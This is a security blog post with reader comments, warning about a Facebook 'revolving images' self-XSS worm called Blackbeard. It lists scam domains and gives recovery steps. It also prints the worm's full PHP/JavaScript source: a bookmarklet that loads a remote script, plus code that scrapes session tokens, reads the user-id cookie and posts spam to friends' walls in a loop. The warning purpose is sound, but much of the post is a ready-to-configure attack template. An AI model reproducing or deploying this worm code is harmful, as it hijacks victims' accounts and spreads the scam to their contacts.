You might have seen the latest revolving images scam in which your friends post some wall messages on your Facebook wall with a link . We have covered some facebook scams earlier ,but this one is far more dangerous than the previous one as it will give your personalized email for facebook updates to the hacker . This worm has been codenamed Blackbeard by the group of hackers and they are continuously improving their script . Earlier it was just facebook updates on your wall and writing something on others wall but now this also makes you fan of some facebook pages .
Really cool Facebook revolving images. MUST SEE http://rotatingimage2.tk/ .
You might also get several versions of this message :
Hi Frends, Just See Facebook Images Revolve!! WOW Its Amazing :) see here >>http://fbookcoolimages.tk/
Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/”
Some other domains that are used for spreading this Facebook worm are :
- http://revolvingimages.info/fb/
- http://kewlpics.tk/
- http://itsmajic.tk/
- http://bit.ly/91wrzd
- http://bit.ly/faceb00ked
- http://majicalimages.tk/
Reasons behind the problem :
Most the people are running this javascript while they are logged into the Facebook :
javascript:(a = (b = document).createElement("script")).src = "hackingjavascriptlink", b.body.appendChild(a); void(0)Consequences of running the javascript on your profile :
- It will update your facebook status plus it will post on your friends wall and it will spread the link of that scam website .
- The hacker will gain access to your personalized email something like ( 1233bhjkkoo@m.facebook.com ) through which you update your facebook status . Since sending an email to this email address will update your Facebook status anytime ,the hacker can update your Facebook Wall as long as you don’t change the email .
- Please remember after running the javascript ,the hacker won’t be getting your user id or password
- You will also automatically like some facebook fan pages due to this action of yours .
Here’s the solution to this if you got affected the worm created :
- You need to refresh your personalized email again so that the hacker don’t have access to your Facebook wall .
- Go the Facebook Mobile from here http://www.facebook.com/mobile/ .
- Scroll down to upload via email and you will find out and email address,that’s the email the hacker is using to update your Facebook account .
- Click on find out more .
After this step you will find something like this :
- So, now refresh your personalized email .
- Since , you also might have liked some random facebook pages , so remove them manually by going through the tutorial we gave earlier for another facebook scam . You can also run a security scan on your facebook feed to check whether anyone sent you a malicious link or not .
We have also got the latest version of the source code used by the guys ,but we are deleting some versions of it for safety purpose :
<?php
header("Content-type: text/javascript");
if(isset($_GET['show'])){
if(!isset($_SERVER['HTTP_REFERER'])) header("Location: http://www.facebook.com/");
if(!preg_match("/facebook.com/", $_SERVER['HTTP_REFERER'], $isit)) header("Location: http://www.facebook.com/");
echo <<<_HTML_
// script name : blackbeard
// author : Yash n friends
// be nice and dont remove credits ... :)
txt="msg1"; // Msg 1 to be spammed
txtee="msg2"; // msg 2 to be spammed
sitename="http://youtwebsite.com/themes/"; // your site name... must include / at end
nextfile="next.php"; // your log filename
yourpageid="101059326616167"; // your fanpage id
llimit=15; // number of ppl to spam (15 is a good limit)
//DONT EDIT BELOW THIS LINE
// Skip to last line and edit link in script
//==========================
alert("Please wait 2-3 mins while we process! Do not refresh this window or click any link.");
i = 0;
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\\\"composer_id\\\\" value=\\\\"([\d\w]+)\\\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";
t = setInterval(function () {
if (i >= llimit ) return;
if(i%2==0)
{
//update
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else
{
//update
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
i += 1;
}, 2000);
}
}, send(null);
}
}, send(null);
_HTML_;
exit;
}else{
echo <<<_HTML_
Run this script in addressbar for free facebook themes: <br>
javascript:(a = (b = document).createElement("script")).src = "//youtwebsite.com/themes/index.php?show", b.body.appendChild(a); void(0)
_HTML_;
}
?>Also if you really want to revolve the images of any page you can use this simple javascript :
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);On a new note some guys are bit more clever and they are using it with a different name like change your facebook theme or something similar . So, its better you don’t run javascripts on Facebook until and unless you yourself know what is contained in it .
Also, if you still have problems then let us know or you can post your problem in our computer forum .
Thanks To alert users, i think a intelligence is needed to avoid such Threats!
I think some basic knowledge of spammers and hackers will do fine ,also with soo much javascript experience in Orkut ,its easy to find people doing the same on Facebook. Get ready to see more people doing the same .
I was not aware of this…But we must take care of these scams in near future…A few days back Twitter users had similar sort of scam issues…
Yah, rightly said
Nice share. I will recommend everybody to read this page.
WOW just what I was looking for. Came here by searching for spam